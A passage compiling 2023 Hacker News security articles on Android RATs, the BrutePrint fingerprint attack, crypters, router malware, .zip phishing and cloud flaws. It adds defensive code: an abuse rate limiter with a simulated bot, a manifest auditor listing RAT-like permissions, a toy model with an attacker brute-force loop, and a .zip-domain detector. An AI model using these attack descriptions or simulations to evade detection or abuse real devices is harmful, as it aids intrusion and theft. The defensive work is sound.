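    A request is flagged when any one key goes over its limit inside the window.
    """

    def __init__(self, limits, window_s=60.0):
        self.limits = limits                 # e.g. {"ip": 30, "fingerprint": 10, "target": 20}
        self.window_s = window_s
        self._events = defaultdict(deque)    # (dimension, value) -> timestamps inside the window

    def check(self, now, **dims):
        """Record one request at time `now` and return the dimensions whose limit it exceeds."""
        exceeded = []
        for dim, value in dims.items():
            if dim not in self.limits:
                continue
            dq = self._events[(dim, value)]
            while dq and now - dq[0] > self.window_s:   # expire events that left the window
                dq.popleft()
            dq.append(now)
            if len(dq) > self.limits[dim]:
                exceeded.append(dim)
        return exceeded

def simulate_proxyware_bot(guard, requests=15):
    """Constructed scenario: one scripted client solving CAPTCHAs through a human-solver service and
    rotating to a new exit IP on every request, but with a stable fingerprint and a single target.
    Returns the index of the first request that gets flagged, or None if none was."""
    for i in range(requests):
        over = guard.check(now=float(i), ip=f"198.51.100.{i}", fingerprint="fp-bot-1", target="listing-42")
        if over:
            return i
    return None

if __name__ == "__main__":
    g = AbuseVelocityGuard({"ip": 30, "fingerprint": 10, "target": 20})
    print("first flagged request:", simulate_proxyware_bot(g))
```

The fingerprint key is itself forgeable, which is why the target (the account, listing or endpoint being hammered) is counted too: an attacker can rotate IPs and fingerprints, but not the thing they are trying to abuse.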


Sneaky DogeRAT Trojan Poses as Popular Apps, Targets Indian Android Users
30.5.23  Virus  The Hacker News
A new open source remote access trojan (RAT) called DogeRAT targets Android users primarily located in India as part of a sophisticated malware campaign.

The malware is distributed via social media and messaging platforms under the guise of legitimate applications like Opera Mini, OpenAI ChatGPT, and Premium versions of YouTube, Netflix, and Instagram.

"Once installed on a victim's device, the malware gains unauthorized access to sensitive data, including contacts, messages, and banking credentials," cybersecurity firm CloudSEK said in a Monday report.

"It can also take control of the infected device, enabling malicious actions such as sending spam messages, making unauthorized payments, modifying files, and even remotely capturing photos through the device's cameras."

DogeRAT, like many other malware-as-a-service (MaaS) offerings, is promoted by its India-based developer through a Telegram channel that has amassed more than 2,100 subscribers since it was created on June 9, 2022.

This also includes a premium subscription that's sold for dirt-cheap prices ($30) with additional capabilities such as taking screenshots, stealing images, capturing clipboard content, and logging keystrokes.

In a further attempt to make it more accessible to other criminal actors, the free version of DogeRAT has been made available on GitHub, alongside screenshots and video tutorials showcasing its functions.

"We do not endorse any illegal or unethical use of this tool," the developer states in the repository's README.md file. "The user assumes all responsibility for the use of this software."

Upon installation, the Java-based malware requests intrusive permissions to carry out its data-gathering objectives, before exfiltrating the harvested data to a Telegram bot.

"This campaign is a stark reminder of the financial motivation driving scammers to continually evolve their tactics," CloudSEK researcher Anshuman Das said.

"They are not just limited to creating phishing websites, but also distributing modified RATs or repurposing malicious apps to execute scam campaigns that are low-cost and easy to set up, yet yield high returns."
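A fake "Premium" video app has no business reading SMS or drawing over other apps, and that mismatch is visible in the manifest before the app ever runs. As an added example (not CloudSEK's or DogeRAT's code), the block below audits a decoded AndroidManifest.xml for the permission combination that gives an app the reach described above. The manifest is constructed for the example and is not taken from a real sample; on a real APK the binary manifest must first be decoded (apktool or aapt).

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Permission set that, in combination, gives an app RAT-like reach: the data DogeRAT is reported to
# take (contacts, SMS, camera) plus permissions commonly abused to hide, overlay and act for the user.
HIGH_RISK = {
    "android.permission.READ_SMS": "read OTP / banking SMS",
    "android.permission.RECEIVE_SMS": "intercept incoming SMS",
    "android.permission.SEND_SMS": "send spam or premium SMS",
    "android.permission.READ_CONTACTS": "harvest contacts",
    "android.permission.CAMERA": "capture photos remotely",
    "android.permission.RECORD_AUDIO": "record the microphone",
    "android.permission.SYSTEM_ALERT_WINDOW": "draw overlay phishing screens",
    "android.permission.BIND_ACCESSIBILITY_SERVICE": "drive the UI and log keystrokes",
    "android.permission.REQUEST_INSTALL_PACKAGES": "sideload further payloads",
}

# Constructed manifest for a fake "YouTube Premium" build; it is not taken from a real sample.
SAMPLE_MANIFEST = b"""<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.yt.premium">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <application android:label="YouTube Premium">
    <service android:name=".Svc" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"/>
  </application>
</manifest>
"""

def audit_manifest(manifest_xml, expected_perms=frozenset()):
    """Flag high-risk permissions an app requests beyond those its stated purpose justifies.

    manifest_xml: decoded AndroidManifest.xml bytes (e.g. after apktool/aapt); expected_perms: the
    high-risk permissions a legitimate app of this kind would plausibly need (a video player: none).
    """
    root = ET.fromstring(manifest_xml)
    name_attr = f"{{{ANDROID_NS}}}name"
    perm_attr = f"{{{ANDROID_NS}}}permission"
    requested = {el.get(name_attr) for el in root.iter("uses-permission")}
    requested.discard(None)
    # A service protected by BIND_ACCESSIBILITY_SERVICE is an accessibility service: full UI control
    # once the user is tricked into enabling it, even though it is not a <uses-permission>.
    for svc in root.iter("service"):
        if svc.get(perm_attr) == "android.permission.BIND_ACCESSIBILITY_SERVICE":
            requested.add("android.permission.BIND_ACCESSIBILITY_SERVICE")
    flagged = {p: HIGH_RISK[p] for p in sorted(requested) if p in HIGH_RISK and p not in expected_perms}
    verdict = "RAT-like" if len(flagged) >= 3 else ("suspicious" if flagged else "ok")
    return {"package": root.get("package"), "flagged": flagged, "verdict": verdict}

if __name__ == "__main__":
    print(audit_manifest(SAMPLE_MANIFEST))
```

The verdict thresholds are arbitrary triage values; the durable signal is the gap between what the app claims to be and what it asks for.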

The findings come as Google-owned Mandiant detailed a new Android backdoor called LEMONJUICE that's designed to enable remote control of and access to a compromised device.

"The malware is capable of tracking device location, recording the microphone, retrieving contact lists, accessing call, SMS, clipboard, and notification logs, viewing installed applications, downloading and uploading files, viewing connectivity status, and executing additional commands from the C2 server," researcher Jared Wilson said.

In a related development, Doctor Web uncovered over 100 apps containing a spyware component called SpinOk that have been collectively downloaded more than 421 million times via the Google Play Store.

The module, which is distributed as a marketing software development kit (SDK), is engineered to collect sensitive information stored in the devices as well as copy and substitute clipboard contents.

Some of the most popular apps that have been found to contain the SpinOk trojan are Noizz, Zapya, VFly, MVBit, Biugo, Crazy Drop, Cashzine, Fizzo Novel, CashEM, and Tick.


New BrutePrint Attack Lets Attackers Unlock Smartphones with Fingerprint Brute-Force
30.5.23  Attack  The Hacker News

Researchers have discovered an inexpensive attack technique that could be leveraged to brute-force fingerprints on smartphones to bypass user authentication and seize control of the devices.

The approach, dubbed BrutePrint, bypasses limits put in place to counter failed biometric authentication attempts by weaponizing two zero-day vulnerabilities in the smartphone fingerprint authentication (SFA) framework.

The flaws, Cancel-After-Match-Fail (CAMF) and Match-After-Lock (MAL), exploit logical defects in the authentication framework that arise from insufficient protection of fingerprint data on the Serial Peripheral Interface (SPI) of fingerprint sensors.

The result is a "hardware approach to do man-in-the-middle (MitM) attacks for fingerprint image hijacking," researchers Yu Chen and Yiling He said in a research paper. "BrutePrint acts as a middleman between fingerprint sensor and TEE [Trusted Execution Environment]."

The goal, at its core, is to be able to perform an unlimited number of fingerprint image submissions until there is a match. It, however, presupposes that a threat actor is already in possession of the target device in question.

Additionally, it requires the adversary to be in possession of a fingerprint database and a setup comprising a microcontroller board and an auto-clicker that can hijack data sent by a fingerprint sensor to pull off the attack for as low as $15.

The first of the two vulnerabilities that make this attack possible is CAMF, which abuses the framework's fault-tolerance handling: by invalidating the checksum of the fingerprint data, an attacker can have a failed attempt cancelled as a transmission error rather than recorded as a failure, thereby obtaining unlimited tries.

MAL, on the other hand, exploits a side-channel to infer matches of the fingerprint images on the target devices, even when it enters a lockout mode following too many repeated login attempts.

"Although the lockout mode is further checked in Keyguard to disable unlocking, the authentication result has been made by TEE," the researchers explained.

"As Success authentication result is immediately returned when a matched sample is met, it's possible for side-channel attacks to infer the result from behaviors such as response time and the number of acquired images."
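The two flaws are easiest to see as two missing checks in a state machine: an attempt that ends in an error must still count against the failure budget (CAMF), and a locked-out device must refuse to run the matcher at all rather than letting Keyguard discard a result that has already been produced (MAL). The block below is an added example, a toy model written for this page and not the code of any vendor's TEE or of the Android framework; the fingerprint "database" is a list of integers and the lockout threshold of five is an assumed typical value.

```python
from dataclasses import dataclass

MAX_FAILURES = 5   # attempts a phone typically allows before fingerprint unlock is locked out

@dataclass
class SfaModel:
    """Toy model of a smartphone fingerprint authentication (SFA) flow.

    This is illustration only, not the code of any vendor's TEE or of the Android framework.
    The two booleans select the vulnerable or the hardened behaviour for each of the paper's flaws.
    """
    enrolled: int                 # the one fingerprint template that unlocks the phone
    count_cancelled: bool         # hardened against CAMF: a cancelled attempt still counts as a failure
    lock_enforced_in_tee: bool    # hardened against MAL: the TEE refuses to match while locked out
    failures: int = 0
    locked: bool = False
    tee_matches: int = 0          # how often the TEE produced a "match" result (what MAL observes)

    def submit(self, sample, cancel_on_fail=False):
        """One fingerprint submission from the attacker's sensor-side middleman.

        cancel_on_fail models CAMF: the attacker corrupts the data checksum as soon as the TEE reports
        a mismatch, so the framework aborts with an error instead of registering a failed attempt.
        """
        if self.locked and self.lock_enforced_in_tee:
            return "rejected-locked"
        if sample == self.enrolled:
            self.tee_matches += 1                      # a result exists, and its timing leaks (MAL)
            return "keyguard-blocked" if self.locked else "unlock"
        if cancel_on_fail and not self.count_cancelled:
            return "cancelled"                         # vulnerable: nothing is counted
        self.failures += 1
        if self.failures >= MAX_FAILURES:
            self.locked = True
        return "fail"

def brute_force(model, candidates):
    """Attacker loop: submit every candidate, always cancelling on mismatch.

    Returns (submissions, outcome): outcome is "unlock", "keyguard-blocked" (the TEE matched while
    locked, which a timing side channel reveals) or "rejected-locked" (the hardened TEE stopped us)."""
    for n, sample in enumerate(candidates, 1):
        result = model.submit(sample, cancel_on_fail=True)
        if result in ("unlock", "keyguard-blocked", "rejected-locked"):
            return n, result
    return len(candidates), "exhausted"

# Constructed fingerprint "database": indices 0..999, with the victim's print at position 137.
CANDIDATES = list(range(1000))
VICTIM_PRINT = 137

def run_scenarios():
    vulnerable = SfaModel(VICTIM_PRINT, count_cancelled=False, lock_enforced_in_tee=False)
    mal_only = SfaModel(VICTIM_PRINT, count_cancelled=True, lock_enforced_in_tee=False)
    hardened = SfaModel(VICTIM_PRINT, count_cancelled=True, lock_enforced_in_tee=True)
    return {
        "vulnerable": brute_force(vulnerable, CANDIDATES) + (vulnerable.failures,),
        "mal_only": brute_force(mal_only, CANDIDATES) + (mal_only.tee_matches,),
        "hardened": brute_force(hardened, CANDIDATES) + (hardened.failures,),
    }

if __name__ == "__main__":
    print(run_scenarios())
```

In the vulnerable configuration the attacker reaches the victim's print after 138 submissions with zero recorded failures; with only the CAMF fix in place the device locks after five, but the TEE still reports the 138th sample as a match and the side channel reveals it; with both fixes the sixth submission is refused outright.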

In an experimental setup, BrutePrint was evaluated against 10 different smartphone models from Apple, Huawei, OnePlus, OPPO, Samsung, Xiaomi, and vivo, yielding infinite attempts on Android and HarmonyOS, and 10 additional attempts on iOS devices.

The findings come as a group of academics detailed a hybrid side-channel that takes advantage of the "three-way tradeoff between execution speed (i.e., frequency), power consumption, and temperature" in modern system-on-chips (SoCs) and GPUs to conduct "browser-based pixel stealing and history sniffing attacks" against Chrome 108 and Safari 16.2.

The attack, called Hot Pixels, takes advantage of this behavior to mount website fingerprinting attacks and employ JavaScript code to harvest a user's browsing history.

This is accomplished by designing a computationally heavy SVG filter to leak pixel colors by measuring the rendering times and stealthily harvest the information with an accuracy as high as 94%.

The issues have been acknowledged by Apple, Google, AMD, Intel, Nvidia, and Qualcomm. The researchers also recommend "prohibiting SVG filters from being applied to iframes or hyperlinks" and preventing unprivileged access to sensor readings.

BrutePrint and Hot Pixels also follow Google's discovery of 10 security defects in Intel's Trust Domain Extensions (TDX) that could lead to arbitrary code execution, denial-of-service conditions, and loss of integrity.

On a related note, Intel CPUs have also been found susceptible to a side-channel attack that makes use of variations in execution time caused by changing the EFLAGS register during transient execution to decode data without relying on the cache.


AceCryptor: Cybercriminals' Powerful Weapon, Detected in 240K+ Attacks
30.5.23  Virus  The Hacker News
A crypter (alternatively spelled cryptor) malware dubbed AceCryptor has been used to pack numerous strains of malware since 2016.

Slovak cybersecurity firm ESET said it identified over 240,000 detections of the crypter in its telemetry in 2021 and 2022. This amounts to more than 10,000 hits per month.

Some of the prominent malware families contained within AceCryptor are SmokeLoader, RedLine Stealer, RanumBot, Raccoon Stealer, Stop ransomware, and Amadey, among others.

The countries with the most detections include Peru, Egypt, Thailand, Indonesia, Turkey, Brazil, Mexico, South Africa, Poland, and India.

AceCryptor was first highlighted by Avast in August 2022, detailing the use of the malware to distribute Stop ransomware and RedLine Stealer on Discord in the form of 7-Zip files.

Crypters are similar to packers, but instead of using compression, they are known to obfuscate the malware code with encryption to make detection and reverse engineering a lot more challenging.

They are also indicative of a trend where malware authors advertise such capabilities for other threat actors, less technically sophisticated or otherwise, who are looking to armor their creations.

"Even though threat actors can create and maintain their own custom cryptors, for crimeware threat actors it often may be a time-consuming or technically difficult task to maintain their cryptor in a so-called FUD (fully undetectable) state," ESET researcher Jakub Kaloč said.

"Demand for such protection has created multiple crypter-as-a-service (CaaS) options that pack malware."

AceCryptor-packed malware is delivered via trojanized installers of pirated software, spam emails bearing malicious attachments, or other malware that has already compromised a host.

It's also suspected to be sold as a CaaS, owing to the fact that it's used by multiple threat actors to propagate a diverse range of malware families.

The crypter is heavily obfuscated, incorporating a three-layer architecture to progressively decrypt and unpack each stage and ultimately launch the payload, while also featuring anti-VM, anti-debugging, and anti-analysis techniques to fly under the radar.

The second layer, according to ESET, is said to have been introduced in 2019 as an extra protection mechanism.

The findings come as another crypter service codenamed ScrubCrypt has been leveraged by cryptojacking groups like the 8220 Gang to illicitly mine cryptocurrency on infected hosts.

Earlier this January, Check Point also unearthed a packer known as TrickGate that's used to deploy a wide range of malware such as TrickBot, Emotet, AZORult, Agent Tesla, FormBook, Cerber, Maze, and REvil for over six years.


New GobRAT Remote Access Trojan Targeting Linux Routers in Japan
30.5.23  Virus  The Hacker News
Linux routers in Japan are the target of a new Golang remote access trojan (RAT) called GobRAT.

"Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT," the JPCERT Coordination Center (JPCERT/CC) said in a report published today.

The compromise of an internet-exposed router is followed by the deployment of a loader script that acts as a conduit for delivering GobRAT, which, when launched, masquerades as the Apache daemon process (apached) to evade detection.

The loader is also equipped to disable firewalls, establish persistence using the cron job scheduler, and register an SSH public key in the .ssh/authorized_keys file for remote access.

GobRAT, for its part, communicates with a remote server via the Transport Layer Security (TLS) protocol to receive as many as 22 different encrypted commands for execution.

Some of the major commands are as follows -

Obtain machine information
Execute reverse shell
Read/write files
Configure new command-and-control (C2) and protocol
Start SOCKS5 proxy
Execute file in /zone/frpc, and
Attempt to log in to sshd, Telnet, Redis, MySQL, PostgreSQL services running on another machine

The findings come nearly three months after Lumen Black Lotus Labs revealed that business-grade routers have been victimized to spy on victims in Latin America, Europe, and North America using a malware called HiatusRAT.


Don't Click That ZIP File! Phishers Weaponizing .ZIP Domains to Trick Victims
30.5.23  Phishing  The Hacker News
A new phishing technique called "file archiver in the browser" can be leveraged to "emulate" a file archiver software in a web browser when a victim visits a .ZIP domain.

"With this phishing attack, you simulate a file archiver software (e.g., WinRAR) in the browser and use a .zip domain to make it appear more legitimate," security researcher mr.d0x disclosed last week.

Threat actors, in a nutshell, could create a realistic-looking phishing landing page using HTML and CSS that mimics legitimate file archive software, and host it on a .zip domain, thus elevating social engineering campaigns.

In a potential attack scenario, a miscreant could resort to such trickery to redirect users to a credential harvesting page when a file "contained" within the fake ZIP archive is clicked.

"Another interesting use case is listing a non-executable file and when the user clicks to initiate a download, it downloads an executable file," mr.d0x noted. "Let's say you have an 'invoice.pdf' file. When a user clicks on this file, it will initiate the download of a .exe or any other file."

On top of that, the search bar in the Windows File Explorer can emerge as a sneaky conduit where searching for a non-existent .ZIP file opens it directly in the web browser should the file name correspond to a legitimate .zip domain.

"This is perfect for this scenario since the user would be expecting to see a ZIP file," the researcher said. "Once the user performs this, it will auto-launch the .zip domain which has the file archive template, appearing pretty legitimate."

The development comes as Google rolled out eight new top-level domains (TLDs), including ".zip" and ".mov," that have raised some concerns that it could invite phishing and other types of online scams.

This is because .ZIP and .MOV are both legitimate file extension names, potentially confusing unsuspecting users into visiting a malicious website rather than opening a file, and duping them into accidentally downloading malware.
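A defender-side illustration of the file-name/host-name ambiguity described above, added here and not taken from mr.d0x's write-up or from any vendor: the function scans free text (an email body, a chat message, a search-box entry) for tokens that read like an archive or video file name but are also syntactically valid host names under the .zip or .mov TLD, so a mail gateway or awareness tool can flag them for review. The strict DNS-label rule (no underscores, no spaces) is an assumption; browsers may be more lenient.

```python
import re

# TLDs from Google's 2023 batch that collide with common file extensions.
# The article discusses .zip and .mov; extend the set if more collide.
COLLIDING_TLDS = {"zip", "mov"}

# One DNS label: 1-63 chars, letters/digits/hyphens, no leading/trailing hyphen.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"

# A token such as "invoice.zip" or "q3.report.mov": one or more labels followed
# by a colliding TLD, not glued to a URL path, scheme or longer word. Because
# every label is DNS-valid, a browser (or Explorer's search box, as the text
# notes) may resolve the token as a host name instead of opening a local file.
_TOKEN_RE = re.compile(
    rf"(?<![\w./-])((?:{_LABEL}\.)+(?:{'|'.join(sorted(COLLIDING_TLDS))}))(?![\w-])",
    re.IGNORECASE,
)


def find_ambiguous_file_names(text: str) -> list[str]:
    """Return, lower-cased and in order of appearance, every token in `text`
    that is both a plausible file name and a valid host name under a
    colliding TLD. Tokens that are already part of a URL (preceded by '/' or
    '.') or contain characters DNS does not allow (e.g. '_') are not returned,
    since they are unambiguous one way or the other."""
    return [m.group(1).lower() for m in _TOKEN_RE.finditer(text)]
```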

"ZIP files are often used as part of the initial stage of an attack chain, typically being downloaded after a user accesses a malicious URL or opens an email attachment," Trend Micro said.

"Beyond ZIP archives being used as a payload, it's also likely that malicious actors will use ZIP-related URLs for downloading malware with the introduction of the .zip TLD."

While reactions are decidedly mixed on the risk posed as a result of confusion between domain names and file names, it's expected to equip actors acting in bad faith with yet another vector for phishing.

The discovery also comes as cybersecurity company Group-IB said it detected a 25% surge in the use of phishing kits in 2022, identifying 3,677 unique kits, when compared to the preceding year.

Of particular interest is the uptick in the trend of using Telegram to collect stolen data, almost doubling from 5.6% in 2021 to 9.4% in 2022.

That's not all. Phishing attacks are also becoming more sophisticated, with cybercriminals increasingly focusing on packing the kits with detection evasion capabilities such as the use of antibots and dynamic directories.

"Phishing operators create random website folders that are only accessible by the recipient of a personalized phishing URL and cannot be accessed without the initial link," the Singapore-headquartered firm said.

"This technique allows phishers to evade detection and blacklisting as the phishing content will not reveal itself."

According to a new report from Perception Point, the number of advanced phishing attacks attempted by threat actors in 2022 rose 356%. The total number of attacks increased by 87% over the course of the year.

This continued evolution of phishing schemes is exemplified by a fresh wave of attacks that have been observed leveraging compromised Microsoft 365 accounts and restricted-permission message (.rpmsg) encrypted emails to harvest users' credentials.

"The use of encrypted .rpmsg messages means that the phishing content of the message, including the URL links, are hidden from email scanning gateways," Trustwave researchers Phil Hay and Rodel Mendrez explained.

Another instance highlighted by Proofpoint entails the possible abuse of legitimate features in Microsoft Teams to facilitate phishing and malware delivery, including utilizing meeting invites post-compromise by replacing default URLs with malicious links via API calls.

"A different approach that attackers can utilize, given access to a user's Teams token, is using Teams' API or user interface to weaponize existing links in sent messages," the enterprise security firm noted.

"This could be done by simply replacing benign links with links pointing to nefarious websites or malicious resources."


PyPI Implements Mandatory Two-Factor Authentication for Project Owners
30.5.23  Security  The Hacker News
The Python Package Index (PyPI) announced last week that every account that maintains a project on the official third-party software repository will be required to turn on two-factor authentication (2FA) by the end of the year.

"Between now and the end of the year, PyPI will begin gating access to certain site functionality based on 2FA usage," PyPI administrator Donald Stufft said. "In addition, we may begin selecting certain users or projects for early enforcement."

The enforcement also includes organization maintainers, but does not extend to every single user of the service.

The goal is to neutralize the threats posed by account takeover attacks, which an attacker can leverage to distribute trojanized versions of popular packages to poison the software supply chain and deploy malware on a large scale.

PyPI, like other open source repositories such as npm, has witnessed innumerable instances of malware and package impersonation.

Earlier this month, Fortinet FortiGuard Labs discovered over 30 Python libraries that incorporated various features to connect to arbitrary remote URLs and steal sensitive data from compromised machines.

The development comes nearly a year after PyPI made 2FA mandatory for critical project maintainers. The registry is home to 457,125 projects and 704,458 users.

According to cloud monitoring service provider Datadog, 9,580 users and 4,541 projects have been identified as critical, with 2FA enabled in total for 38,248 users to date.


New Stealthy Bandit Stealer Targeting Web Browsers and Cryptocurrency Wallets
28.5.23  Cryptocurrency  The Hacker News
A new stealthy information stealer malware called Bandit Stealer has caught the attention of cybersecurity researchers for its ability to target numerous web browsers and cryptocurrency wallets.

"It has the potential to expand to other platforms as Bandit Stealer was developed using the Go programming language, possibly allowing cross-platform compatibility," Trend Micro said in a Friday report.

The malware is currently focused on targeting Windows by using a legitimate command-line tool called runas.exe that allows users to run programs as another user with different permissions.

The goal is to escalate privileges and execute itself with administrative access, thereby effectively bypassing security measures to harvest wide swathes of data.

That said, Microsoft's access control mitigations to prevent unauthorized execution of the tool mean that an attempt to run the malware binary as an administrator requires providing the necessary credentials.

"By using the runas.exe command, users can run programs as an administrator or any other user account with appropriate privileges, provide a more secure environment for running critical applications, or perform system-level tasks," Trend Micro said.

"This utility is particularly useful in situations where the current user account does not have sufficient privileges to execute a specific command or program."

Bandit Stealer incorporates checks to determine if it's running in a sandbox or virtual environment and terminates a list of blocklisted processes to conceal its presence on the infected system.

It also establishes persistence by means of Windows Registry modifications before commencing its data collection activities that include harvesting personal and financial data stored in web browsers and crypto wallets.

Bandit Stealer is said to be distributed via phishing emails containing a dropper file that opens a seemingly innocuous Microsoft Word attachment as a distraction maneuver while triggering the infection in the background.

Trend Micro said it also detected a fake installer of Heart Sender, a service that automates the process of sending spam emails and SMS messages to numerous recipients, that's used to trick users into launching the embedded malware.

The development comes as the cybersecurity firm uncovered a Rust-based info stealer targeting Windows that leverages a GitHub Codespaces webhook controlled by the attacker as an exfiltration channel to obtain a victim's web browser credentials, credit cards, cryptocurrency wallets, and Steam and Discord tokens.

The malware, in what's a relatively uncommon tactic, achieves persistence on the system by modifying the installed Discord client to inject JavaScript code designed to capture information from the application.

The findings also follow the emergence of several strains of commodity stealer malware like Luca, StrelaStealer, DarkCloud, WhiteSnake, and Invicta Stealer, some of which have been observed propagating via spam emails and fraudulent versions of popular software.

Another notable trend has been the use of YouTube videos to advertise cracked software via compromised channels with millions of subscribers.

Data amassed from stealers can benefit the operators in many ways, enabling identity theft, financial gain, data breaches, credential stuffing attacks, and account takeovers.

The stolen information can also be sold to other actors, serving as a foundation for follow-on attacks that could range from targeted campaigns to ransomware or extortion attacks.

These developments highlight the continued evolution of stealer malware into a more lethal threat, just as the malware-as-a-service (MaaS) market makes them readily available and lowers the barriers to entry for aspiring cybercriminals.

Indeed, data gathered by Secureworks Counter Threat Unit (CTU) has revealed a "thriving infostealer market," with the volume of stolen logs on underground forums like Russian Market registering a 670% jump between June 2021 and May 2023.

"Russian Market offers five million logs for sale which is around ten times more than its nearest forum rival 2easy," the company said.

"Russian Market is well-established among Russian cybercriminals and used extensively by threat actors worldwide. Russian Market recently added logs from three new stealers, which suggests that the site is actively adapting to the ever-changing e-crime landscape."

The MaaS ecosystem, the increasing sophistication notwithstanding, has also been in a state of flux, with law enforcement actions prompting threat actors to peddle their warez on Telegram.

"What we are seeing is an entire underground economy and supporting infrastructure built around infostealers, making it not only possible but also potentially lucrative for relatively low skilled threat actors to get involved," Don Smith, vice president of Secureworks CTU, said.

"Coordinated global action by law enforcement is having some impact, but cybercriminals are adept at reshaping their routes to market."


Critical OAuth Vulnerability in Expo Framework Allows Account Hijacking
28.5.23  Hacking  The Hacker News
A critical security vulnerability has been disclosed in the Open Authorization (OAuth) implementation of the application development framework Expo.io.

The shortcoming, assigned the CVE identifier CVE-2023-28131, has a severity rating of 9.6 on the CVSS scoring system. API security firm Salt Labs said the issue rendered services using the framework susceptible to credential leakage, which could then be used to hijack accounts and siphon sensitive data.

Under certain circumstances, a threat actor could have taken advantage of the flaw to perform arbitrary actions on behalf of a compromised user on various platforms such as Facebook, Google, or Twitter.

Expo, similar to Electron, is an open source platform for developing universal native apps that run on Android, iOS, and the web.

It's worth noting that for the attack to be successful, sites and applications using Expo must have configured the AuthSession Proxy setting for single sign-on (SSO) using a third-party provider such as Google or Facebook.

Put differently, the vulnerability could be leveraged to send the secret token associated with a sign-in provider (e.g., Facebook) to an actor-controlled domain and use it to seize control of the victim's account.

This, in turn, is accomplished by tricking the targeted user into clicking on a specially crafted link that could be sent via traditional social engineering vectors like email, SMS messages, or a dubious website.

Expo, in an advisory, said it deployed a hotfix within hours of responsible disclosure on February 18, 2023. It's also recommended that users migrate from using AuthSession API proxies to directly registering deep link URL schemes with third-party authentication providers to enable SSO features.

"The vulnerability would have allowed a potential attacker to trick a user into visiting a malicious link, logging in to a third-party auth provider, and inadvertently revealing their third-party auth credentials," Expo's James Ide said.

"This was because auth.expo.io used to store an app's callback URL before the user explicitly confirmed they trust the callback URL."

The disclosure follows the discovery of similar OAuth issues in Booking.com (and its sister site Kayak.com) that could have been leveraged to take control of a user's account, gain full visibility into their personal or payment-card data, and perform actions on the victim's behalf.

The findings also come weeks after Swiss cybersecurity company Sonar detailed a path traversal and an SQL injection flaw in the Pimcore enterprise content management system (CVE-2023-28438) that an adversary can abuse to run arbitrary PHP code on the server with the permissions of the webserver.

Sonar, back in March 2023, also revealed an unauthenticated, stored cross-site scripting vulnerability impacting LibreNMS versions 22.10.0 and prior that could be exploited to gain remote code execution when Simple Network Management Protocol (SNMP) is enabled.


Severe Flaw in Google Cloud's Cloud SQL Service Exposed Confidential Data
28.5.23  Vulnerability  The Hacker News
A new security flaw has been disclosed in the Google Cloud Platform's (GCP) Cloud SQL service that could be potentially exploited to obtain access to confidential data.

"The vulnerability could have enabled a malicious actor to escalate from a basic Cloud SQL user to a full-fledged sysadmin on a container, gaining access to internal GCP data like secrets, sensitive files, passwords, in addition to customer data," Israeli cloud security firm Dig said.

Cloud SQL is a fully-managed solution to build MySQL, PostgreSQL, and SQL Server databases for cloud-based applications.

The multi-stage attack chain identified by Dig, in a nutshell, leveraged a gap in the cloud platform's security layer associated with SQL Server to escalate the privileges of a user to that of an administrator role.

The elevated permissions subsequently made it possible to abuse another critical misconfiguration to obtain system administrator rights and take full control of the database server.

From there, a threat actor could access all files hosted on the underlying operating system, enumerate files, and extract passwords, which could then act as a launchpad for further attacks.

"Gaining access to internal data like secrets, URLs, and passwords can lead to exposure of cloud providers' data and customers' sensitive data which is a major security incident," Dig researchers Ofir Balassiano and Ofir Shaty said.

Following responsible disclosure in February 2023, the issue was addressed by Google in April 2023.

The disclosure comes as Google announced the availability of its Automatic Certificate Management Environment (ACME) API for all Google Cloud users to automatically acquire and renew TLS certificates for free.


Predator Android Spyware: Researchers Uncover New Data Theft Capabilities
28.5.23  Android  The Hacker News
Security researchers have detailed the inner workings of the commercial Android spyware called Predator, which is marketed by the Israeli company Intellexa (previously Cytrox).

Predator was first documented by Google's Threat Analysis Group (TAG) in May 2022 as part of attacks leveraging five different zero-day flaws in the Chrome web browser and Android.

The spyware, which is delivered by means of another loader component called Alien, is equipped to record audio from phone calls and VoIP-based apps as well as gather contacts and messages, including from Signal, WhatsApp, and Telegram.

Its other functionalities allow it to hide applications and prevent applications from being executed upon rebooting the handset.

"A deep dive into both spyware components indicates that Alien is more than just a loader for Predator and actively sets up the low-level capabilities needed for Predator to spy on its victims," Cisco Talos said in a technical report.

Spyware like Predator and NSO Group's Pegasus are carefully delivered as part of highly-targeted attacks by weaponizing what are called zero-click exploit chains that typically require no interaction from the victims and allow for code execution and privilege escalation.

"Predator is an interesting piece of mercenary spyware that has been around since at least 2019, designed to be flexible so that new Python-based modules can be delivered without the need for repeated exploitation, thus making it especially versatile and dangerous," Talos explained.

Both Predator and Alien are designed to get around security guardrails in Android, with the latter loaded into a core Android process called Zygote to download and launch other spyware modules, including Predator, from an external server.

It's currently not clear how Alien is activated on an infected device in the first place. However, it's suspected to be loaded from shellcode that's executed by taking advantage of initial-stage exploits.

"Alien is not just a loader but also an executor — its multiple threads will keep reading commands coming from Predator and executing them, providing the spyware with the means to bypass some of the Android framework security features," the company said.

The various Python modules associated with Predator make it possible to accomplish a wide array of tasks such as information theft, surveillance, remote access, and arbitrary code execution.

The spyware, which arrives as an ELF binary before setting up a Python runtime environment, can also add certificates to the store and enumerate the contents of various directories on disk if it's running on a device manufactured by Samsung, Huawei, Oppo, or Xiaomi.

That said, there are still many missing pieces that could help complete the attack puzzle. This comprises a main module called tcore and a privilege escalation mechanism dubbed kmem, both of which have remained elusive to obtain thus far.

Cisco Talos theorized that tcore could have implemented other features like geolocation tracking, camera access, and simulating a shutdown to covertly spy on victims.

The findings come as threat actors' use of commercial spyware has surged in recent years, just as the number of cyber mercenary companies supplying these services is on an upward trajectory.

While these sophisticated tools are intended for exclusive use by governments to counter serious crime and combat national security threats, they have also been abused by customers to surveil dissidents, human rights activists, journalists, and other members of civil society.

As a case in point, digital rights group Access Now said that it uncovered evidence of Pegasus targeting a dozen people in Armenia – including an NGO worker, two journalists, a United Nations official, and a human rights ombudsperson in Armenia. One of the victims was hacked at least 27 times between October 2020 and July 2021.

